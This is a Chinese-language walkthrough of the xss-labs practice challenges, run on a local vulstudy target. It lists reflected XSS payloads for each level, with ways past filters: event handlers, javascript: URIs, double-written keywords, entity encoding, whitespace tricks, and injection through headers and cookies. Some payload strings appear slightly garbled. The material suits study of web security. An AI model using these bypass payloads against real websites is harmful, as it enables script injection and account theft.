-使用vulstudy一键搭建靶机
1 http://192.168.0.200:8091/level1.php?name=test<script>alert(/x/)</script>
2 http://192.168.0.200:8091/level2.php?keyword=test"><script>alert(/x/)</script>
3 http://192.168.0.200:8091/level3.php?keyword=xx'+onmouseover%3D'alert(%2Fx%2F)&submit=搜索
Payload: onm ouSEOver='alert(1)
4 http://192.168.0.200:8091/level4.php?keyword=try+harder!"+onmouseover%3D"alert(%2Fx%2F)&submit=搜索
Payload: onm ouSEOver="alert(1)
5 http://192.168.0.200:8091/level5.php?keyword=find+a+way+out!"><embed+src%3Djavascript%3Aalert(1)>&submit=搜索
本题会检测'on' 字符串和script ,检测到会自动添加下划线为o_nmouSEOver
6 http://192.168.0.200:8091/level6.php?keyword=break+it+out!"><scRipt>alert(%2Fx%2F)<%2Fscript>&submit=搜索
检测href src on data字符并添加下划线
Payload:
7 http://192.168.0.200:8091/level7.php?keyword=move+up!"+oonnmouseover%3D"alert(1)&submit=搜索
过滤on字符,考虑双写
Payload: oonnmouSEOver="alert(1)
8 检测href src on data字符并添加下划线,同时对输入的双引号进行html编码
Payload: 使用unicode编码,unicode编码就是在ascii编码前加&#
orgCode=''
print ';'.join('&#{}'.format(ord(x)) for x in orgCode)
javascript:alert(1)
参考:https://programmer.help/blogs/xss-challenge-tour-by-reading-the-code.html
javas%09cript:alert()
javas%0acript:alert()
javas%0dcript:alert()
9 Payload: javascript:alert(1)//http://
考察绕过strpos
10
Payload: " autofocus="" onfocus="javascript:alert(1)" type="
利用type=""覆盖掉input的隐藏type,从而执行onfocus
11 Payload: 在refer处添加 " autofocus="" onfocus="javascript:alert(1)" type="
12 Payload: 在user-agent处添加 " autofocus="" onfocus="javascript:alert(1)" type="
13 Payload: 在cookie中user处添加 " autofocus="" onfocus="javascript:alert(1)" type="
15 Payload: http://10.150.10.186:8091/level15.php?src='level6.php'
ng-include 为AngularJS 指令 ,主要用来包含其他文件,我们可以包含之前的文件来插入xss。注意这儿使用时浏览器会访问googleapis.com失败导致刷不出来
16 考察绕过空格
Payload: <img%0Asrc=x%0Aonerror=alert(0)>
17 这儿有坑,在firefox下embed标签不显示,不显示的话就利用不成功,需要在chrome下才能正常成功
Payload: http://10.150.10.186:8091/level17.php?arg01=x&arg02= onm ouseover=javascript:alert(1)
18 http://192.168.61.242:8091/level18.php?arg01= onm ouseover&arg02=alert(0)
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。
